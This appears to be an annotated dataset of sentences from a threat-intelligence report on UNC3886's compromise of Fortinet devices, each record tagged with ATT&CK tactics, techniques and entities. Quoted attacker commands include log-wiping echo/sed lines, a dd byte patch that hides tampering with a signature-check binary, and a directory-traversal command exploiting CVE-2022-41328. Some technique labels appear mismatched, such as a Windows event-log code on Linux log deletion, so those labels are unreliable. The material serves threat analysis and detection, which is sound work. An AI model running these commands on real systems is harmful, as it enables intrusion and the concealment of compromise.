"uid": "aptnotes-13_aptnotes_report-p14-s141-8e7f91", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 14, "sentence_id": 141, "context_before": "(month * (year + 1900))", "sentence_text": "* day % 255 year: index starting from 1900 i.e. current_year-1900 month: index starting from 0 date: index starting from 1 If the magic string “ mznCvqSBo ” was found, a reverse shell was created with the C2 IP address and destination port extracted from the rest of the activation packet payload.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "The malware creates a reverse shell connection to a command and control server.", "entities": [ { "text": "reverse shell was created", "start": 170, "end": 195, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p14-s142-1705f3", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 14, "sentence_id": 142, "context_before": "* day % 255 year: index starting from 1900 i.e. current_year-1900 month: index starting from 0 date: index starting from 1 If the magic string “ mznCvqSBo ” was found, a reverse shell was created with the C2 IP address and destination port extracted from the rest of the activation packet payload.", "sentence_text": "When the first magic string was not present, the binary searched for the second magic string “ hpaVAj2FJ ”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p14-s143-e46495", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 14, "sentence_id": 143, "context_before": "When the first magic string was not present, the binary searched for the second magic string “ hpaVAj2FJ ”.", "sentence_text": "If this second magic string was found, the REPTILE process will end.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p14-s144-edd16a", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 14, "sentence_id": 144, "context_before": "If this second magic string was found, the REPTILE process will end.", "sentence_text": "If no magic strings were found, the backdoor continued to listen for other connections.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p14-s145-d4323a", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 14, "sentence_id": 145, "context_before": "If no magic strings were found, the backdoor continued to listen for other connections.", "sentence_text": "Threat Actor Anti-Forensics Clearing and Modifying Logs contained the threat actor’s IP address from multiple log sources.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p14-s146-2abe6e", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 14, "sentence_id": 146, "context_before": "Threat Actor Anti-Forensics Clearing and Modifying Logs contained the threat actor’s IP address from multiple log sources.", "sentence_text": "The commands seen in Figure 22 were utilized by the threat actor to remove log entries containing the IP address used to connect to the THINCRUST backdoor.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.001", "name": "Clear Windows Event Logs" } ], "procedure": "Remove log entries containing the IP address used to access the THINCRUST backdoor.", "entities": [ { "text": "the threat actor", "start": 48, "end": 64, "label": "ThreatActor" }, { "text": "THINCRUST backdoor", "start": 136, "end": 154, "label": "MalwareTool" }, { "text": "remove log entries containing the IP address used to connect to the THINCRUST backdoor", "start": 68, "end": 154, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p14-s147-ae9363", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 14, "sentence_id": 147, "context_before": "The commands seen in Figure 22 were utilized by the threat actor to remove log entries containing the IP address used to connect to the THINCRUST backdoor.", "sentence_text": "echo > /var/log/django.log; \\ echo > /var/log/apache2/error_log; \\ sed -i ‘//d’ /var/log/apache2/*log; \\ ls -alt /var/log/ /var/log/apache2/ Disabling File System Verification on Startup 14/21", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p15-s148-6c7d78", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 15, "sentence_id": 148, "context_before": "echo > /var/log/django.log; \\ echo > /var/log/apache2/error_log; \\ sed -i ‘//d’ /var/log/apache2/*log; \\ ls -alt /var/log/ /var/log/apache2/ Disabling File System Verification on Startup 14/21", "sentence_text": "In an attempt to skip digital signature verification checks made to the file system on boot, the threat actor added the command seen in Figure 23 to the startup config /etc/init.d/localnet within the rootfs.gz archive of both FortiManager and FortiAnalyzer devices.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Add a command to the startup configuration /etc/init.d/localnet to bypass verification checks.", "entities": [ { "text": "the threat actor", "start": 93, "end": 109, "label": "ThreatActor" }, { "text": "added the command seen in Figure 23 to the startup config /etc/init.d/localnet", "start": 110, "end": 188, "label": "Action" }, { "text": "/etc/init.d/localnet", "start": 168, "end": 188, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p15-s149-310768", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 15, "sentence_id": 149, "context_before": "In an attempt to skip digital signature verification checks made to the file system on boot, the threat actor added the command seen in Figure 23 to the startup config /etc/init.d/localnet within the rootfs.gz archive of both FortiManager and FortiAnalyzer devices.", "sentence_text": "printf \"t\" | dd of=/bin/smit bs=1", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p15-s150-dc44d4", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 15, "sentence_id": 150, "context_before": "printf \"t\" | dd of=/bin/smit bs=1", "sentence_text": "Comparing the compromised /bin/smit ( a388ebaef45add5da503e4bf2b9da546 ) with a clean version from both FortiManager and FortiAnalyzer, the modified binary contained a single byte difference.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p15-s151-795d7a", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 15, "sentence_id": 151, "context_before": "Comparing the compromised /bin/smit ( a388ebaef45add5da503e4bf2b9da546 ) with a clean version from both FortiManager and FortiAnalyzer, the modified binary contained a single byte difference.", "sentence_text": "The modified location within /bin/smit is executed when the mount command line argument is given on system startup.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p15-s152-62530a", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 15, "sentence_id": 152, "context_before": "The modified location within /bin/smit is executed when the mount command line argument is given on system startup.", "sentence_text": "Normally, the mount function would perform OpenSSL 1.1.0 digital signature verification checks on the files in Figure 24 against /data/.fmg_sign , but this modification changed a conditional jump instruction to an unconditional jump instruction which always skipped digital signature verification checks normally made on the system files.\n/data/extlinux.sys\n/data/extlinux.conf\n/data/boot.msg\n/data/vmlinuz\n/data/rootfse-fe\nchecked by /bin/smit Since the mount command executes prior to /etc/init.d/localnet on system startup, the dd command will overwrite the 22,866th byte of /bin/smit with the character “ t ”, reverting the binary to a state that appears as if it was never tampered with, even if the file was hashed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p15-s153-7d6a25", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 15, "sentence_id": 153, "context_before": "Normally, the mount function would perform OpenSSL 1.1.0 digital signature verification checks on the files in Figure 24 against /data/.fmg_sign , but this modification changed a conditional jump instruction to an unconditional jump instruction which always skipped digital signature verification checks normally made on the system files.\n/data/extlinux.sys\n/data/extlinux.conf\n/data/boot.msg\n/data/vmlinuz\n/data/rootfse-fe\nchecked by /bin/smit Since the mount command executes prior to /etc/init.d/localnet on system startup, the dd command will overwrite the 22,866th byte of /bin/smit with the character “ t ”, reverting the binary to a state that appears as if it was never tampered with, even if the file was hashed.", "sentence_text": "Attribution\nUNC3886 is an advanced cyber espionage group with unique capabilities in how they operate on-network as well as the tools they utilize in their campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p15-s154-e64a97", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 15, "sentence_id": 154, "context_before": "Attribution\nUNC3886 is an advanced cyber espionage group with unique capabilities in how they operate on-network as well as the tools they utilize in their campaigns.", "sentence_text": "UNC3886 has been observed targeting firewall and virtualization technologies which lack EDR support.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p15-s155-b62278", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 15, "sentence_id": 155, "context_before": "UNC3886 has been observed targeting firewall and virtualization technologies which lack EDR support.", "sentence_text": "Their ability to manipulate firewall firmware and exploit a zero-day indicates they have curated a deeper-level of understanding of such technologies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p15-s156-720e8a", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 15, "sentence_id": 156, "context_before": "Their ability to manipulate firewall firmware and exploit a zero-day indicates they have curated a deeper-level of understanding of such technologies.", "sentence_text": "UNC3886 has modified publicly available malware, specifically targeting *nix operating systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p15-s157-03498b", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 15, "sentence_id": 157, "context_before": "UNC3886 has modified publicly available malware, specifically targeting *nix operating systems.", "sentence_text": "Another threat cluster unrelated to UNC3886, suspected to be from China has recently been observed targeting zero-day vulnerabilities in Fortinet as reported by Mandiant in mid-January of 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p15-s158-1b1c88", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 15, "sentence_id": 158, "context_before": "Another threat cluster unrelated to UNC3886, suspected to be from China has recently been observed targeting zero-day vulnerabilities in Fortinet as reported by Mandiant in mid-January of 2023.", "sentence_text": "Conclusion\nThe activity discussed in this blog post is further evidence that advanced cyber espionage threat actors are taking advantage of any technology available to persist and traverse a target environment, especially those technologies that do not support EDR solutions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p15-s159-57dbd3", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 15, "sentence_id": 159, "context_before": "Conclusion\nThe activity discussed in this blog post is further evidence that advanced cyber espionage threat actors are taking advantage of any technology available to persist and traverse a target environment, especially those technologies that do not support EDR solutions.", "sentence_text": "This presents a unique challenge for investigators as many network appliances lack solutions to detect runtime modifications made to the underlying operating system and require direct involvement of the manufacturer to collect forensic images.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p15-s160-b432d4", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 15, "sentence_id": 160, "context_before": "This presents a unique challenge for investigators as many network appliances lack solutions to detect runtime modifications made to the underlying operating system and require direct involvement of the manufacturer to collect forensic images.", "sentence_text": "Cross organizational communication and collaboration is key to providing both manufacturers with early notice of new attack methods in the wild before they are made public and investigators with expertise to better shed light on these new attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p15-s161-2c9e18", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 15, "sentence_id": 161, "context_before": "Cross organizational communication and collaboration is key to providing both manufacturers with early notice of new attack methods in the wild before they are made public and investigators with expertise to better shed light on these new attacks.", "sentence_text": "blog post to minimize the attack surface of ESXi hosts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p15-s162-d2eb11", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 15, "sentence_id": 162, "context_before": "blog post to minimize the attack surface of ESXi hosts.\n15/21", "sentence_text": "In addition, we would also like to thank Fortinet and VMware for their collaboration on this research.\n15/21", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p16-s163-548e95", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 16, "sentence_id": 163, "context_before": "In addition, we would also like to thank Fortinet and VMware for their collaboration on this research.\n15/21", "sentence_text": "Fortinet released two additional resources covering CVE-2022-41328 and an analysis of identified attacker activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p16-s164-e60142", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 16, "sentence_id": 164, "context_before": "Fortinet released two additional resources covering CVE-2022-41328 and an analysis of identified attacker activity.", "sentence_text": "MITRE ATT&CK Techniques Impact T1565.001: Stored Data Manipulation Defense Evasion T1027: Obfuscated Files or Information T1070: Indicator Removal T1070.003: Clear Command History T1070.004:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p16-s165-38bb8a", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 16, "sentence_id": 165, "context_before": "MITRE ATT&CK Techniques Impact T1565.001: Stored Data Manipulation Defense Evasion T1027: Obfuscated Files or Information T1070: Indicator Removal T1070.003: Clear Command History T1070.004:", "sentence_text": "File Deletion T1078: Valid Accounts T1140: Deobfuscate/Decode Files or Information T1202: Indirect Command Execution T1218.011:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p16-s166-f8021b", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 16, "sentence_id": 166, "context_before": "File Deletion T1078: Valid Accounts T1140: Deobfuscate/Decode Files or Information T1202: Indirect Command Execution T1218.011:", "sentence_text": "Rundll32 T1222: File and Directory Permissions Modification T1497: Virtualization/Sandbox Evasion T1497.001: System Checks T1620: Reflective Code Loading Credential Access T1552: Unsecured Credentials T1555.005: Password Managers Discovery T1016: System Network Configuration Discovery T1033: System Owner/User Discovery T1057: Process Discovery T1082: System Information Discovery T1083: File and Directory Discovery T1087:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p16-s167-bb9979", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 16, "sentence_id": 167, "context_before": "Rundll32 T1222: File and Directory Permissions Modification T1497: Virtualization/Sandbox Evasion T1497.001: System Checks T1620: Reflective Code Loading Credential Access T1552: Unsecured Credentials T1555.005: Password Managers Discovery T1016: System Network Configuration Discovery T1033: System Owner/User Discovery T1057: Process Discovery T1082: System Information Discovery T1083: File and Directory Discovery T1087:", "sentence_text": "Account Discovery T1518: Software Discovery Collection T1074.001: Local Data Staging T1560: Archive Collected Data T1560.001: Archive via Utility Execution T1059:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p16-s168-f483e7", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 16, "sentence_id": 168, "context_before": "Account Discovery T1518: Software Discovery Collection T1074.001: Local Data Staging T1560: Archive Collected Data T1560.001: Archive via Utility Execution T1059:", "sentence_text": "Command and Scripting Interpreter T1059.001:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p16-s169-b8c3f4", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 16, "sentence_id": 169, "context_before": "Command and Scripting Interpreter T1059.001:", "sentence_text": "PowerShell T1059.003: Windows Command Shell T1059.004: Unix Shell T1059.006: Python T1129: Shared Modules Command and Control T1095: Non-Application Layer Protocol T1102.001: Dead Drop Resolver T1105: Ingress Tool Transfer T1571: Non-Standard Port T1573.001: Symmetric Cryptography Lateral Movement 16/21", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p17-s170-ebd6fb", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 17, "sentence_id": 170, "context_before": "PowerShell T1059.003: Windows Command Shell T1059.004: Unix Shell T1059.006: Python T1129: Shared Modules Command and Control T1095: Non-Application Layer Protocol T1102.001: Dead Drop Resolver T1105: Ingress Tool Transfer T1571: Non-Standard Port T1573.001: Symmetric Cryptography Lateral Movement 16/21", "sentence_text": "T1021.004: SSH\nIndicators of Compromise Type Values Description FortiGate execute wireless-controller hs20-icon upload-icon ftp ../../../../../../bin/lspci or similar commands containing directory traversal are indicative of attempted exploitation of CVE-2022- 41328 to upload a file to a normally restricted directory FortiGate execute wireless-controller hs20-icon upload-icon tftp ../../../../../../bin/lspci or similar commands containing directory traversal are indicative of attempted exploitation of CVE-2022- 41328 to upload a file to a normally restricted directory Filename /bin", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p17-s171-279b70", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 17, "sentence_id": 171, "context_before": "T1021.004: SSH\nIndicators of Compromise Type Values Description FortiGate execute wireless-controller hs20-icon upload-icon ftp ../../../../../../bin/lspci or similar commands containing directory traversal are indicative of attempted exploitation of CVE-2022- 41328 to upload a file to a normally restricted directory FortiGate execute wireless-controller hs20-icon upload-icon tftp ../../../../../../bin/lspci or similar commands containing directory traversal are indicative of attempted exploitation of CVE-2022- 41328 to upload a file to a normally restricted directory Filename /bin", "sentence_text": "/fgfm CASTLETAP Sample found on a FortiGate device Symlinked /bin/lspci -> /bin/sysctl lspci should be a standalone binary File within FortiGate devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p17-s172-a2d1b1", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 17, "sentence_id": 172, "context_before": "/fgfm CASTLETAP Sample found on a FortiGate device Symlinked /bin/lspci -> /bin/sysctl lspci should be a standalone binary File within FortiGate devices.", "sentence_text": "A symlink suggests that a modification was made to the file system URI /p/util/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p17-s173-f5b7a1", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 17, "sentence_id": 173, "context_before": "A symlink suggests that a modification was made to the file system URI /p/util/", "sentence_text": "show_device_info", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p17-s174-bc147b", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 17, "sentence_id": 174, "context_before": "show_device_info", "sentence_text": "An API call which created by the threat actor which acted as a persistent backdoor on FortiManager devices URI /p/utils/fortigate_syslog_send An API call which created by the threat actor which acted as a persistent backdoor on FortiAnalyzer devices", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": null, "procedure": "The threat actor creates API-based backdoors on the system.", "entities": [ { "text": "created by the threat actor", "start": 18, "end": 45, "label": "Action" }, { "text": "acted as a persistent backdoor", "start": 52, "end": 82, "label": "Action" }, { "text": "/p/utils/fortigate_syslog_send", "start": 111, "end": 141, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p17-s175-92607d", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 17, "sentence_id": 175, "context_before": "An API call which created by the threat actor which acted as a persistent backdoor on FortiManager devices URI /p/utils/fortigate_syslog_send An API call which created by the threat actor which acted as a persistent backdoor on FortiAnalyzer devices", "sentence_text": "Python get_device_info A malicious python function added to Function /usr/local/lib/python3.8/proj/util/views.py on FortiAnalyzer and FortiManager devices which provided threat actors with a persistent backdoor Filename /bin/support Threat actor script which launches /bin/auth (TABLEFLIP) and /bin/klogd (REPTILE) and deletes the two files along with /bin/support from disk Filename /bin/auth TABLEFLIP Sample - A passive utility to setup traffic redirection from a specific IP address destined to the FortiManager on TCP541 to another specified port.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" }, { "id": "T1070", "name": "Indicator Removal on Host" } ], "procedure": "Add a malicious function to system path, launch TABLEFLIP and REPTILE, and delete related files from disk.", "entities": [ { "text": "get_device_info", "start": 7, "end": 22, "label": "MalwareTool" }, { "text": "TABLEFLIP", "start": 279, "end": 288, "label": "MalwareTool" }, { "text": "REPTILE", "start": 306, "end": 313, "label": "MalwareTool" }, { "text": "added to Function /usr/local/lib/python3.8/proj/util/views.py", "start": 51, "end": 112, "label": "Action" }, { "text": "launches /bin/auth (TABLEFLIP) and /bin/klogd (REPTILE)", "start": 259, "end": 314, "label": "Action" }, { "text": "deletes the two files along with /bin/support from disk", "start": 319, "end": 374, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p17-s176-068582", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 17, "sentence_id": 176, "context_before": "Python get_device_info A malicious python function added to Function /usr/local/lib/python3.8/proj/util/views.py on FortiAnalyzer and FortiManager devices which provided threat actors with a persistent backdoor Filename /bin/support Threat actor script which launches /bin/auth (TABLEFLIP) and /bin/klogd (REPTILE) and deletes the two files along with /bin/support from disk Filename /bin/auth TABLEFLIP Sample - A passive utility to setup traffic redirection from a specific IP address destined to the FortiManager on TCP541 to another specified port.", "sentence_text": "Filename /bin/klogd REPTILE - A backdoor utility that listens for a specialized packet for activation 17/21", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p18-s177-d11a50", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 18, "sentence_id": 177, "context_before": "Filename /bin/klogd REPTILE - A backdoor utility that listens for a specialized packet for activation 17/21", "sentence_text": "Config printf \"t\" | dd of=/bin/smit bs=1", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p18-s178-cd7ced", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 18, "sentence_id": 178, "context_before": "Config printf \"t\" | dd of=/bin/smit bs=1", "sentence_text": "init.d/localnet on FortiAnalyzer and FortiManager devices to revert a binary after it was modified to bypass digital signature verification of system files MD5 9ce2459168cf4b5af494776a70e0feda Threat actor script which launches /bin/auth (TABLEFLIP) and /bin/klogd (REPTILE) and deletes the two files along with /bin/support from disk MD5 b6e92149efaf78e9ce7552297505b9d5 TABLEFLIP sample", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" }, { "id": "T1070", "name": "Indicator Removal on Host" } ], "procedure": "Launch TABLEFLIP and REPTILE components and delete related files from disk.", "entities": [ { "text": "TABLEFLIP", "start": 239, "end": 248, "label": "MalwareTool" }, { "text": "REPTILE", "start": 266, "end": 273, "label": "MalwareTool" }, { "text": "launches /bin/auth (TABLEFLIP) and /bin/klogd (REPTILE)", "start": 219, "end": 274, "label": "Action" }, { "text": "deletes the two files along with /bin/support from disk", "start": 279, "end": 334, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p18-s179-b5f77d", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 18, "sentence_id": 179, "context_before": "init.d/localnet on FortiAnalyzer and FortiManager devices to revert a binary after it was modified to bypass digital signature verification of system files MD5 9ce2459168cf4b5af494776a70e0feda Threat actor script which launches /bin/auth (TABLEFLIP) and /bin/klogd (REPTILE) and deletes the two files along with /bin/support from disk MD5 b6e92149efaf78e9ce7552297505b9d5 TABLEFLIP sample", "sentence_text": "MD5 53a69adac914808eced2bf8155a7512d REPTILE variant sample MD5 a388ebaef45add5da503e4bf2b9da546 Modified /bin/smit MD5 88711ebc99e1390f1ce2f42a6de0654d Localnet sample MD5 e2d2884869f48f40b32fb27cc3bdefff CASTLETAP sample MD5 53a69adac914808eced2bf8155a7512d REPTILE variant sample MD5", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p18-s180-1991a4", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 18, "sentence_id": 180, "context_before": "MD5 53a69adac914808eced2bf8155a7512d REPTILE variant sample MD5 a388ebaef45add5da503e4bf2b9da546 Modified /bin/smit MD5 88711ebc99e1390f1ce2f42a6de0654d Localnet sample MD5 e2d2884869f48f40b32fb27cc3bdefff CASTLETAP sample MD5 53a69adac914808eced2bf8155a7512d REPTILE variant sample MD5", "sentence_text": "64bdf7a631bc76b01b985f1d46b35ea6 THINCRUST sample MD5 a86a8fe875a89816e5808588154a067e THINCRUST sample", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p18-s181-eb7b08", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 18, "sentence_id": 181, "context_before": "64bdf7a631bc76b01b985f1d46b35ea6 THINCRUST sample MD5 a86a8fe875a89816e5808588154a067e THINCRUST sample", "sentence_text": "MD5 3e43511c4f7f551290292394c4e21de7 Related to THINCRUST SHA1 86f3623b3fb8d5303b6c9d8295292a5c2ceb2889 Localnet sample SHA1 75c092098e3409d366a46fdde6a92ff97d29cee1 Smit sample SHA1 9dca7f1af5752bb007e5cc55acd2511f03049ee5 TABLEFLIP sample SHA1 8c40fc87fa3b25a559585b10a8ca11c81fb09f75 CASTLETAP sample SHA1 3109b890901499f7ebb90f8870a7d1617d27e7c9 REPTILE variant sample SHA1 b8bdaa1bd204a6c710875b0c4265655d1fd37d52 /bin/support sample SHA1 1a077212735617a665a6b631e34a6aedcbc41713 THINCRUST sample SHA1 d5f8436e9815358e33b8243abda76c9b398943e2 THINCRUST sample SHA1 8ef5159944d048fe84e51a818c9b11ebcfa98517 Related to THINCRUST SHA256 245e4646e5d984c2da4cfe223bb2fae679441bcf42b254fc193ae97dc32af7ad", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p18-s182-f64730", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 18, "sentence_id": 182, "context_before": "MD5 3e43511c4f7f551290292394c4e21de7 Related to THINCRUST SHA1 86f3623b3fb8d5303b6c9d8295292a5c2ceb2889 Localnet sample SHA1 75c092098e3409d366a46fdde6a92ff97d29cee1 Smit sample SHA1 9dca7f1af5752bb007e5cc55acd2511f03049ee5 TABLEFLIP sample SHA1 8c40fc87fa3b25a559585b10a8ca11c81fb09f75 CASTLETAP sample SHA1 3109b890901499f7ebb90f8870a7d1617d27e7c9 REPTILE variant sample SHA1 b8bdaa1bd204a6c710875b0c4265655d1fd37d52 /bin/support sample SHA1 1a077212735617a665a6b631e34a6aedcbc41713 THINCRUST sample SHA1 d5f8436e9815358e33b8243abda76c9b398943e2 THINCRUST sample SHA1 8ef5159944d048fe84e51a818c9b11ebcfa98517 Related to THINCRUST SHA256 245e4646e5d984c2da4cfe223bb2fae679441bcf42b254fc193ae97dc32af7ad", "sentence_text": "Localnet sample SHA256 9fb09fe6db61fbdd19ac9c368e2f64fb9606119649830762fa467719c480ed44", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p18-s183-ada0c5", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 18, "sentence_id": 183, "context_before": "Localnet sample SHA256 9fb09fe6db61fbdd19ac9c368e2f64fb9606119649830762fa467719c480ed44", "sentence_text": "Smit sample SHA256 18afbad17dee0e4330a85b782e8e580c6125d8a7127cda69ad0e2728d505a6f5 TABLEFLIP sample 18/21", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p19-s184-521d59", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 19, "sentence_id": 184, "context_before": "Smit sample SHA256 18afbad17dee0e4330a85b782e8e580c6125d8a7127cda69ad0e2728d505a6f5 TABLEFLIP sample 18/21", "sentence_text": "SHA256 a00fed53b1ece4610c8b52934c20af3667d455f092a77f8d9bc46fdb9047e41a CASTLETAP sample SHA256 eb6af99148f0ce5b58e414162ff2b7567b4cf08953862a088996365ff306014b REPTILE variant sample SHA256 33c22b2db8c0948c67204485972d2eb856e13dca16132371337fc3534e3df16d /bin/support sample SHA256 abefe121e5c895bf63be80152ccbe2d7bb5ad985aa3ab989bcb7c0804b90d004 THINCRUST sample SHA256", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p19-s185-9e27ac", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 19, "sentence_id": 185, "context_before": "SHA256 a00fed53b1ece4610c8b52934c20af3667d455f092a77f8d9bc46fdb9047e41a CASTLETAP sample SHA256 eb6af99148f0ce5b58e414162ff2b7567b4cf08953862a088996365ff306014b REPTILE variant sample SHA256 33c22b2db8c0948c67204485972d2eb856e13dca16132371337fc3534e3df16d /bin/support sample SHA256 abefe121e5c895bf63be80152ccbe2d7bb5ad985aa3ab989bcb7c0804b90d004 THINCRUST sample SHA256", "sentence_text": "2266667af7532a32b9c21c330a9fe56356ca66610e39654804a7262f2af61017 THINCRUST sample SHA256 4e4c5e5ca588bd84b67a37b654ec522768fa83e535ff795a5c196da8f8b9737d Related to THINCRUST YARA Rules rule M_Hunting_Util_TABLEFLIP_1 { meta:\nauthor = \"Mandiant\" description = \"Looks for TABLEFLIP Binary\" md5 = \"b6e92149efaf78e9ce7552297505b9d5\" strings:\n$z1 = \"%1$s.*%2$d\" fullword $x1 = 